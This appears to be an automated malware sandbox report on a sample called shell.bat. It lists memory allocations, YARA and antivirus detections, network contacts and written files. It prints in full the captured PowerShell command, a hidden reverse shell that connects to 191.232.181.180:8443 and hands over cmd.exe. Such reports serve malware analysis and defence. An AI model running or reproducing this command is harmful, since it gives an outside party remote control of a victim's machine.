NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02799000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05131000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05133000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05134000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05135000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05138000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05139000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05141000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 17, 2024, 8:47 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05144000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"cmd.exe"

cmdline

powershell -w hidden -nop -c $a='191.232.181.180';$b=8443;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 17, 2024, 8:47 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

191.232.181.180

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"cmd.exe"

Creates a suspicious Powershell process (2 events)

option	-nop				value	Does not load current user profile
option	-w hidden				value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Lionic	Trojan.Script.Boxter.m!c
Cynet	Malicious (score: 99)
VIPRE	Heur.BZC.PZQ.Boxter.651.4747D66F
Arcabit	Heur.BZC.PZQ.Boxter.651.4747D66F
Symantec	Trojan.Gen.NPE
ESET-NOD32	PowerShell/ReverseShell.BD
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Backdoor.PowerShell.Agent.gen
BitDefender	Heur.BZC.PZQ.Boxter.651.4747D66F
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.651.4747D66F
Emsisoft	Heur.BZC.PZQ.Boxter.651.4747D66F (B)
F-Secure	Exploit.EXP/YAV.Minerva.nzcpl
FireEye	Heur.BZC.PZQ.Boxter.651.4747D66F
Ikarus	Trojan.Script
Google	Detected
Avira	EXP/YAV.Minerva.nzcpl
Kingsoft	Win32.Troj.Undef.a
Microsoft	Trojan:Script/Wacatac.B!ml
ZoneAlarm	HEUR:Backdoor.PowerShell.Agent.gen
GData	Heur.BZC.PZQ.Boxter.651.4747D66F
Varist	ABRisk.WRYD-5
Tencent	Win32.Backdoor.Agent.Bdhl
MAX	malware (ai score=81)
AVG	Script:SNH-gen [Trj]
alibabacloud	Backdoor:Win/ReverseShell.BF

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	192.168.56.101:49165
dead_host	191.232.181.180:8443

shell.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All